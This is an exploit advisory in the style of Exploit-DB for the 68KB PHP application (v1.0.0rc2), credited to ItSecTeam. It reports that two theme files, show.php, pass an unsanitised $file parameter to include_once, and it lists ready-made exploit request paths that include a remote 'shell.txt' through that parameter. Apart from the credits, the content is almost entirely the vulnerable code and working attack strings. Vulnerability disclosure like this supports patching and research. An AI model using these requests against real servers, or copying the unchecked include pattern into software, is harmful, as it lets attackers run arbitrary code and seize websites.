68KB - Multiple Remote File Inclusions

EDB-ID:

11904

CVE:





Platform:

PHP

Date:

2010-03-27


===========================================================================
( #Topic : 68kb
( #Bug type : multi remote file include
( #Download : http://68kb.googlecode.com/files/68kb-v1.0.0rc2.zip
( #Advisory :
===========================================================================
( #Author : ItSecTeam
( #Email : Bug@ITSecTeam.com #
( #Website: http://www.itsecteam.com #
( #Forum : http://forum.ITSecTeam.com #
( #Original Advisory:
www.ITSecTeam.com/en/vulnerabilities/vulnerability27.htm
( #Special Tnx : ahmadbady , M3hr@n.S And All Team Members!


vul:===================================================================
path/themes/front/default/modules/show.php
<?php include_once($file); ?>
vul:===================================================================
path/themes/admin/default/modules/show.php
<?php include_once($file); ?>
---------------------------------------------------------------------
exploit:================================================================

path/themes/front/default/modules/show.php?file=shell.txt?
path/themes/admin/default/modules/show.php?file=shell.txt?

--------------------------------------